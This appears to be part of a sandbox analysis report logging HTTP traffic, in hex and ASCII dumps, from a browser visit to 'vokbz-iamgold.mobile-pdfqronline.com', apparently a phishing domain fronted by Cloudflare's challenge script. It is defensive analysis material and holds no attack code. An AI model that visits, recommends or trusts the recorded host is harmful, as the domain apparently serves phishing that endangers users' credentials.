                                                                                                                                                2024-10-28 16:47:32 UTC1369INData Raw: 68 65 50 6e 33 5f 2e 55 56 54 44 52 78 44 62 34 30 42 67 6f 44 34 62 6d 77 4d 54 6a 6a 74 6d 58 76 56 59 69 6e 6b 7a 54 76 57 47 59 5a 48 5a 4d 6a 6b 2e 4f 75 76 62 4b 31 6d 68 61 31 5a 53 31 30 42 4f 78 4a 64 4e 5a 52 6c 38 2e 47 4c 6b 53 75 4b 4c 73 4e 67 38 69 50 73 33 4f 77 34 67 58 4b 6a 5a 64 77 67 74 48 67 38 32 48 53 52 59 6c 6c 43 78 4e 43 58 66 77 6d 47 6c 5a 43 69 34 38 6c 72 43 41 6c 55 32 32 42 49 6a 44 56 4a 41 72 45 56 58 78 46 6f 73 77 6d 68 49 61 53 77 4d 44 74 71 31 42 75 53 56 73 39 6b 70 33 57 61 31 42 6b 76 72 6a 52 31 52 4e 39 66 4f 31 6b 4a 31 65 65 4e 4b 4d 36 76 6d 34 2e 67 4a 31 4f 71 59 6e 47 75 49 39 38 39 76 5a 39 35 4b 63 55 4d 74 64 4e 30 41 32 61 5a 5f 7a 6a 47 31 30 76 47 77 64 65 48 39 66 6c 67 77 33 47 38 50 41 4e 43 4c
                                                                                                                                                Data Ascii: hePn3_.UVTDRxDb40BgoD4bmwMTjjtmXvVYinkzTvWGYZHZMjk.OuvbK1mha1ZS10BOxJdNZRl8.GLkSuKLsNg8iPs3Ow4gXKjZdwgtHg82HSRYllCxNCXfwmGlZCi48lrCAlU22BIjDVJArEVXxFoswmhIaSwMDtq1BuSVs9kp3Wa1BkvrjR1RN9fO1kJ1eeNKM6vm4.gJ1OqYnGuI989vZ95KcUMtdN0A2aZ_zjG10vGwdeH9flgw3G8PANCL
                                                                                                                                                2024-10-28 16:47:32 UTC1043INData Raw: 55 30 75 37 42 30 6d 4d 69 33 48 35 6e 64 61 4f 48 41 70 55 4c 5a 30 74 7a 6d 76 61 33 76 42 5a 69 59 79 49 7a 42 37 45 62 32 66 5a 57 39 44 68 75 45 6d 4c 66 74 6b 71 58 6a 45 68 68 2e 6a 54 4b 68 78 31 31 69 61 4c 5f 79 5a 6e 4c 76 49 68 37 37 37 55 57 61 37 67 4a 50 31 30 71 6e 68 4b 46 56 44 73 57 32 30 4b 6b 35 67 4c 72 59 64 5f 42 7a 7a 58 6b 78 42 6b 61 31 38 22 7d 3b 76 61 72 20 63 70 6f 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 63 70 6f 2e 73 72 63 20 3d 20 27 2f 63 64 6e 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 68 2f 62 2f 6f 72 63 68 65 73 74 72 61 74 65 2f 63 68 6c 5f 70 61 67 65 2f 76 31 3f 72 61 79 3d 38 64 39 63 36 38 38 34 61 61 63 38 33 31 36
                                                                                                                                                Data Ascii: U0u7B0mMi3H5ndaOHApULZ0tzmva3vBZiYyIzB7Eb2fZW9DhuEmLftkqXjEhh.jTKhx11iaL_yZnLvIh777UWa7gJP10qnhKFVDsW20Kk5gLrYd_BzzXkxBka18"};var cpo = document.createElement('script');cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=8d9c6884aac8316
                                                                                                                                                2024-10-28 16:47:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                5192.168.2.1649716184.28.90.27443
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:47:32 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Accept: */*
                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                Range: bytes=0-2147483646
                                                                                                                                                User-Agent: Microsoft BITS/7.8
                                                                                                                                                Host: fs.microsoft.com
                                                                                                                                                2024-10-28 16:47:32 UTC515INHTTP/1.1 200 OK
                                                                                                                                                ApiVersion: Distribute 1.1
                                                                                                                                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                Server: ECAcc (lpl/EF06)
                                                                                                                                                X-CID: 11
                                                                                                                                                X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                X-Ms-Region: prod-weu-z1
                                                                                                                                                Cache-Control: public, max-age=158890
                                                                                                                                                Date: Mon, 28 Oct 2024 16:47:32 GMT
                                                                                                                                                Content-Length: 55
                                                                                                                                                Connection: close
                                                                                                                                                X-CID: 2
                                                                                                                                                2024-10-28 16:47:32 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                6192.168.2.1649722188.114.97.34436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:47:34 UTC1032OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=8d9c6884aac83168 HTTP/1.1
                                                                                                                                                Host: vokbz-iamgold.mobile-pdfqronline.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                sec-ch-ua-arch: "x86"
                                                                                                                                                sec-ch-ua-full-version: "117.0.5938.132"
                                                                                                                                                sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                                                                                                sec-ch-ua-bitness: "64"
                                                                                                                                                sec-ch-ua-model: ""
                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                Accept: */*
                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                Referer: https://vokbz-iamgold.mobile-pdfqronline.com/11384/?__cf_chl_rt_tk=RfTckejA3IsTnmGx2hMxZW0at9qomI1KvAylxSBhkEw-1730134052-1.0.1.1-oWnDs99zxb7jkIe_.4yR5kObhB4Q3c5Vmnk_QRJ_VXc
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:47:34 UTC879INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 28 Oct 2024 16:47:34 GMT
                                                                                                                                                Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                Content-Length: 108002
                                                                                                                                                Connection: close
                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V1%2FZ%2BlM0tEy2SEaWCpRn0fOwmJnN5c9zwVNzkYd4nKXJbgtARbRaWNggeecl%2Fo7i2cGuYeJv5MXUlIQUFJZSUE8MSrs1Yey4LcoSWTRjhV37r%2BEuGy%2FwQueUBrpuypbCFCFQqVHiUHBurvpOYwbUdt2883Z%2BdZE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8d9c68928ddf4606-DFW
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1021&sent=3&recv=5&lost=0&retrans=0&sent_bytes=2858&recv_bytes=1632&delivery_rate=2779270&cwnd=251&unsent_bytes=0&cid=d2c69cb3c8d9fb25&ts=877&x=0"
                                                                                                                                                2024-10-28 16:47:34 UTC490INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 53 52 3d 74 72 75 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 76 45 73 72 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 7d 2c
                                                                                                                                                Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.uaSR=true;window._cf_chl_opt.vEsr2={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support"},
                                                                                                                                                2024-10-28 16:47:34 UTC1369INData Raw: 72 69 66 69 63 61 74 69 6f 6e 25 32 30 73 75 63 63 65 73 73 66 75 6c 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 74 69 6d 65 6f 75 74 22 3a 22 54 69 6d 65 64 25 32 30 6f 75 74 22 2c 22 62 72 6f 77 73 65 72 5f 6e 6f 74 5f 73 75 70 70 6f 72 74 65 64 22 3a 22 42 72 6f 77 73 65 72 25 32 30 69 73 25 32 30 75 6e 73 75 70 70 6f 72 74 65 64 25 32 30 61 6e 64 25 32 30 63 61 6e 6e 6f 74 25 32 30 63 6f 6d 70 6c 65 74 65 25 32 30 76 65 72 69 66 69 63 61 74 69 6f 6e 22 2c 22 68 75 6d 61 6e 5f 62 75 74 74 6f 6e 5f 74 65 78 74 22 3a 22 56 65 72 69 66 79 25 32 30 79 6f 75 25 32 30 61 72 65 25 32 30 68 75 6d 61 6e 22 2c 22 72 65 76 69 65 77 5f 63 6f 6e 6e 65 63 74 69 6f 6e 22 3a 22 25 32 35 25 37 42 70 6c 61 63 65 68 6f 6c 64 65 72 2e 63 6f 6d 25 37 44 25 32 30 6e 65 65 64 73
                                                                                                                                                Data Ascii: rification%20successful","turnstile_timeout":"Timed%20out","browser_not_supported":"Browser%20is%20unsupported%20and%20cannot%20complete%20verification","human_button_text":"Verify%20you%20are%20human","review_connection":"%25%7Bplaceholder.com%7D%20needs
                                                                                                                                                2024-10-28 16:47:34 UTC1369INData Raw: 6b 25 32 30 74 6f 25 32 30 67 65 74 25 32 30 74 6f 25 32 30 74 68 65 25 32 30 64 65 73 69 72 65 64 25 32 30 70 61 67 65 25 32 30 6f 72 25 32 30 74 72 79 25 32 30 67 6f 69 6e 67 25 32 30 74 6f 25 32 30 74 68 65 25 32 30 72 6f 6f 74 25 32 30 6f 66 25 32 30 25 32 35 25 37 42 70 6c 61 63 65 68 6f 6c 64 65 72 2e 63 6f 6d 25 37 44 2e 22 2c 22 66 61 76 69 63 6f 6e 5f 61 6c 74 22 3a 22 49 63 6f 6e 25 32 30 66 6f 72 25 32 30 25 32 35 25 37 42 70 6c 61 63 65 68 6f 6c 64 65 72 2e 63 6f 6d 25 37 44 22 2c 22 63 68 61 6c 6c 65 6e 67 65 5f 72 75 6e 6e 69 6e 67 22 3a 22 56 65 72 69 66 79 69 6e 67 25 32 30 79 6f 75 25 32 30 61 72 65 25 32 30 68 75 6d 61 6e 2e 25 32 30 54 68 69 73 25 32 30 6d 61 79 25 32 30 74 61 6b 65 25 32 30 61 25 32 30 66 65 77 25 32 30 73 65 63 6f 6e
                                                                                                                                                Data Ascii: k%20to%20get%20to%20the%20desired%20page%20or%20try%20going%20to%20the%20root%20of%20%25%7Bplaceholder.com%7D.","favicon_alt":"Icon%20for%20%25%7Bplaceholder.com%7D","challenge_running":"Verifying%20you%20are%20human.%20This%20may%20take%20a%20few%20secon
                                                                                                                                                2024-10-28 16:47:34 UTC1369INData Raw: 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 25 32 32 25 33 45 43 6c 69 63 6b 25 32 30 68 65 72 65 25 32 30 66 6f 72 25 32 30 6d 6f 72 65 25 32 30 69 6e 66 6f 72 6d 61 74 69 6f 6e 25 33 43 25 32 46 61 25 33 45 22 2c 22 66 6f 6f 74 65 72 5f 74 65 78 74 22 3a 22 50 65 72 66 6f 72 6d 61 6e 63 65 25 32 30 25 32 36 61 6d 70 25 33 42 25 32 30 73 65 63 75 72 69 74 79 25 32 30 62 79 25 32 30 43 6c 6f 75 64 66 6c 61 72 65 22 2c 22 74 69 6d 65 5f 63 68 65 63 6b 5f 63 61 63 68 65 64 5f 77
                                                                                                                                                Data Ascii: evelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","footer_text":"Performance%20%26amp%3B%20security%20by%20Cloudflare","time_check_cached_w
                                                                                                                                                2024-10-28 16:47:34 UTC1369INData Raw: 77 65 73 74 25 32 30 76 65 72 73 69 6f 6e 2e 22 7d 2c 22 70 6f 6c 79 66 69 6c 6c 73 22 3a 7b 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 5f 61 6c 77 61 79 73 5f 70 61 73 73 22 3a 66 61 6c 73 65 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 66 61 6c 73 65 2c 22 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 5f 6f 75 74 70 75 74 5f 73 75 62 74 69 74 6c 65 22 3a 66 61 6c 73 65 2c 22 74 75 72 6e 73 74 69 6c 65 5f 6f 76 65 72 72 75 6e 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 66 61 6c 73 65 2c 22 74 75 72 6e 73 74 69 6c 65 5f 74 69 6d 65 6f 75 74 22 3a 66 61 6c 73 65 7d 2c 22 72 74 6c 22 3a 66 61 6c 73 65 2c 22 6c 61 6e 67 22 3a 22 65 6e 2d 75 73 22 7d 3b 7e 66 75 6e 63 74 69 6f 6e 28 67 46 2c 65 4d 2c 65 4e 2c
                                                                                                                                                Data Ascii: west%20version."},"polyfills":{"testing_only_always_pass":false,"turnstile_feedback_description":false,"feedback_report_output_subtitle":false,"turnstile_overrun_description":false,"turnstile_timeout":false},"rtl":false,"lang":"en-us"};~function(gF,eM,eN,
                                                                                                                                                2024-10-28 16:47:34 UTC1369INData Raw: 69 6f 6e 28 67 2c 68 29 7b 72 65 74 75 72 6e 20 67 3e 68 7d 2c 27 69 61 63 71 42 27 3a 66 75 6e 63 74 69 6f 6e 28 67 2c 68 29 7b 72 65 74 75 72 6e 20 67 3e 3e 68 7d 2c 27 6e 67 6d 4b 66 27 3a 66 75 6e 63 74 69 6f 6e 28 67 2c 68 29 7b 72 65 74 75 72 6e 20 67 5e 68 7d 2c 27 54 47 64 73 4d 27 3a 66 75 6e 63 74 69 6f 6e 28 67 2c 68 29 7b 72 65 74 75 72 6e 20 68 5e 67 7d 2c 27 45 75 6f 52 54 27 3a 66 75 6e 63 74 69 6f 6e 28 67 2c 68 29 7b 72 65 74 75 72 6e 20 68 3d 3d 3d 67 7d 2c 27 76 53 42 77 68 27 3a 66 75 6e 63 74 69 6f 6e 28 67 2c 68 29 7b 72 65 74 75 72 6e 20 68 5e 67 7d 2c 27 51 63 4e 66 71 27 3a 66 75 6e 63 74 69 6f 6e 28 67 2c 68 29 7b 72 65 74 75 72 6e 20 67 28 68 29 7d 2c 27 64 76 5a 45 7a 27 3a 66 75 6e 63 74 69 6f 6e 28 67 2c 68 29 7b 72 65 74 75
                                                                                                                                                Data Ascii: ion(g,h){return g>h},'iacqB':function(g,h){return g>>h},'ngmKf':function(g,h){return g^h},'TGdsM':function(g,h){return h^g},'EuoRT':function(g,h){return h===g},'vSBwh':function(g,h){return h^g},'QcNfq':function(g,h){return g(h)},'dvZEz':function(g,h){retu
                                                                                                                                                2024-10-28 16:47:34 UTC1369INData Raw: 34 31 29 5d 28 30 2c 69 29 29 6a 3d 21 31 3b 65 6c 73 65 20 69 66 28 69 3d 3d 3d 31 35 39 29 7b 66 6f 72 28 6b 3d 63 5b 68 66 28 31 30 36 37 29 5d 5b 68 66 28 36 37 39 29 5d 28 27 7c 27 29 2c 6c 3d 30 3b 21 21 5b 5d 3b 29 7b 73 77 69 74 63 68 28 6b 5b 6c 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 6d 3d 31 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 27 3a 6a 2a 3d 63 5b 68 66 28 34 35 39 29 5d 28 63 5b 68 66 28 38 37 35 29 5d 28 31 2c 2d 32 2a 28 69 3e 3e 37 29 29 2c 6f 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 6e 3d 63 5b 68 66 28 31 30 32 32 29 5d 28 74 68 69 73 2e 68 5b 63 5b 68 66 28 31 30 32 32 29 5d 28 31 38 2c 74 68 69 73 2e 67 29 5d 5b 33 5d 2c 63 5b 68 66 28 38 37 35 29 5d 28 63 5b 68 66 28 39 37 31 29 5d 28 74 68 69 73 2e 68 5b 63
                                                                                                                                                Data Ascii: 41)](0,i))j=!1;else if(i===159){for(k=c[hf(1067)][hf(679)]('|'),l=0;!![];){switch(k[l++]){case'0':m=1;continue;case'1':j*=c[hf(459)](c[hf(875)](1,-2*(i>>7)),o);continue;case'2':n=c[hf(1022)](this.h[c[hf(1022)](18,this.g)][3],c[hf(875)](c[hf(971)](this.h[c
                                                                                                                                                2024-10-28 16:47:34 UTC1369INData Raw: 32 35 36 29 26 32 35 35 2e 39 31 29 2c 32 33 33 29 5d 2c 6f 2b 2b 29 3b 7d 65 6c 73 65 20 69 66 28 69 3d 3d 3d 37 35 29 6a 3d 42 28 74 68 69 73 29 3b 65 6c 73 65 20 69 66 28 38 21 3d 3d 69 29 7b 69 66 28 32 34 33 3d 3d 3d 69 29 7b 66 6f 72 28 69 3d 43 28 74 68 69 73 29 2c 6a 3d 5b 5d 2c 6f 3d 30 3b 6f 3c 69 3b 6a 5b 68 66 28 31 33 31 36 29 5d 28 74 68 69 73 2e 68 5b 63 5b 68 66 28 31 34 33 35 29 5d 28 31 38 2c 74 68 69 73 2e 67 29 5d 5b 33 5d 5e 63 5b 68 66 28 34 32 35 29 5d 28 63 5b 68 66 28 39 37 31 29 5d 28 74 68 69 73 2e 68 5b 31 38 2e 36 37 5e 74 68 69 73 2e 67 5d 5b 31 5d 5b 68 66 28 39 37 38 29 5d 28 74 68 69 73 2e 68 5b 31 38 5e 74 68 69 73 2e 67 5d 5b 30 5d 2b 2b 29 2c 37 30 29 2b 32 35 36 2c 32 35 35 29 5e 37 2e 33 38 29 2c 6f 2b 2b 29 3b 7d 65
                                                                                                                                                Data Ascii: 256)&255.91),233)],o++);}else if(i===75)j=B(this);else if(8!==i){if(243===i){for(i=C(this),j=[],o=0;o<i;j[hf(1316)](this.h[c[hf(1435)](18,this.g)][3]^c[hf(425)](c[hf(971)](this.h[18.67^this.g][1][hf(978)](this.h[18^this.g][0]++),70)+256,255)^7.38),o++);}e
                                                                                                                                                2024-10-28 16:47:34 UTC1369INData Raw: 65 2b 31 2c 31 29 2c 66 3d 63 5b 68 66 28 31 31 33 38 29 5d 28 31 65 33 2c 65 4d 5b 68 66 28 31 32 30 38 29 5d 5b 68 66 28 34 33 37 29 5d 28 32 3c 3c 65 2c 33 32 29 29 2c 65 4d 5b 68 66 28 39 30 33 29 5d 28 66 75 6e 63 74 69 6f 6e 28 68 67 29 7b 68 67 3d 68 66 2c 65 4e 5b 68 67 28 31 31 31 33 29 5d 5b 68 67 28 31 31 33 34 29 5d 28 29 7d 2c 66 29 7d 2c 65 4d 5b 67 46 28 31 34 35 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 67 2c 68 2c 68 68 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 2c 73 2c 78 2c 42 2c 43 2c 44 29 7b 69 3d 28 68 68 3d 67 46 2c 7b 27 65 5a 49 78 4e 27 3a 66 75 6e 63 74 69 6f 6e 28 45 29 7b 72 65 74 75 72 6e 20 45 28 29 7d 2c 27 71 6a 43 6c 6f 27 3a 68 68 28 31 34 30 37 29 2c 27 74 4b 45 59 42 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 2c 47
                                                                                                                                                Data Ascii: e+1,1),f=c[hf(1138)](1e3,eM[hf(1208)][hf(437)](2<<e,32)),eM[hf(903)](function(hg){hg=hf,eN[hg(1113)][hg(1134)]()},f)},eM[gF(1455)]=function(f,g,h,hh,i,j,k,l,m,n,o,s,x,B,C,D){i=(hh=gF,{'eZIxN':function(E){return E()},'qjClo':hh(1407),'tKEYB':function(E,F,G
                                                                                                                                                2024-10-28 16:47:34 UTC1369INData Raw: 5d 3d 66 2c 42 5b 68 68 28 31 30 35 31 29 5d 3d 6a 2c 42 2e 63 63 3d 67 2c 42 5b 68 68 28 35 33 32 29 5d 3d 6b 2c 42 5b 68 68 28 31 31 31 30 29 5d 3d 6f 2c 43 3d 4a 53 4f 4e 5b 68 68 28 31 31 37 36 29 5d 28 42 29 2c 44 3d 67 44 5b 68 68 28 31 33 30 33 29 5d 28 43 29 5b 68 68 28 37 30 35 29 5d 28 27 2b 27 2c 68 68 28 35 31 35 29 29 2c 73 5b 68 68 28 31 31 30 35 29 5d 28 27 76 5f 27 2b 65 4d 5b 68 68 28 38 38 39 29 5d 5b 68 68 28 37 36 36 29 5d 2b 27 3d 27 2b 44 29 7d 63 61 74 63 68 28 46 29 7b 7d 7d 2c 65 4d 5b 67 46 28 31 33 30 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 64 2c 68 69 2c 65 2c 66 2c 67 2c 68 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 29 7b 28 68 69 3d 67 46 2c 65 3d 7b 27 78 74 4b 55 42 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e
                                                                                                                                                Data Ascii: ]=f,B[hh(1051)]=j,B.cc=g,B[hh(532)]=k,B[hh(1110)]=o,C=JSON[hh(1176)](B),D=gD[hh(1303)](C)[hh(705)]('+',hh(515)),s[hh(1105)]('v_'+eM[hh(889)][hh(766)]+'='+D)}catch(F){}},eM[gF(1308)]=function(d,hi,e,f,g,h,i,j,k,l,m){(hi=gF,e={'xtKUB':function(n,o){return n


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                7192.168.2.1649723188.114.97.34436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:47:36 UTC435OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=8d9c6884aac83168 HTTP/1.1
                                                                                                                                                Host: vokbz-iamgold.mobile-pdfqronline.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                Accept: */*
                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:47:36 UTC877INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 28 Oct 2024 16:47:36 GMT
                                                                                                                                                Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                Content-Length: 101553
                                                                                                                                                Connection: close
                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ou2pGY18vijvpsQ5M%2BHzVL%2FLGpD0%2Bth9enVS9KH6eI0gKDa3t1KKrqNFxxcvkOzeuLiJ9r6RjzGjTXulOGlIeWJBte8xRUSVmT2RQnyizN95GReQr%2Bz99R1KyZ3Q69668pEAbpkJs%2FmK4gjWYxEKEtSSPfVpGTw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8d9c689bef132e51-DFW
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1451&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2857&recv_bytes=1013&delivery_rate=2052445&cwnd=251&unsent_bytes=0&cid=ba1a4ffb8390b6af&ts=144&x=0"
                                                                                                                                                2024-10-28 16:47:36 UTC492INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 53 52 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 76 45 73 72 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 7d
                                                                                                                                                Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.uaSR=false;window._cf_chl_opt.vEsr2={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support"}
                                                                                                                                                2024-10-28 16:47:36 UTC1369INData Raw: 77 25 32 30 73 65 63 6f 6e 64 73 2e 22 2c 22 72 65 64 69 72 65 63 74 69 6e 67 5f 74 65 78 74 5f 6f 76 65 72 72 75 6e 22 3a 22 25 32 35 25 37 42 70 6c 61 63 65 68 6f 6c 64 65 72 2e 63 6f 6d 25 37 44 25 32 30 69 73 25 32 30 74 61 6b 69 6e 67 25 32 30 6c 6f 6e 67 65 72 25 32 30 74 68 61 6e 25 32 30 65 78 70 65 63 74 65 64 25 32 30 74 6f 25 32 30 72 65 70 6c 79 2e 25 32 30 43 68 65 63 6b 25 32 30 79 6f 75 72 25 32 30 49 6e 74 65 72 6e 65 74 25 32 30 63 6f 6e 6e 65 63 74 69 6f 6e 25 32 30 61 6e 64 25 32 30 25 33 43 61 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 72 65 66 72 65 73 68 5f 6c 69 6e 6b 25 32 32 25 33 45 72 65 66 72 65 73 68 25 32 30 74 68 65 25 32 30 70 61 67 65 25 33 43 25 32 46 61 25 33 45 25 32 30 69 66 25 32 30 74 68 65 25 32 30 69 73 73 75 65 25
                                                                                                                                                Data Ascii: w%20seconds.","redirecting_text_overrun":"%25%7Bplaceholder.com%7D%20is%20taking%20longer%20than%20expected%20to%20reply.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%
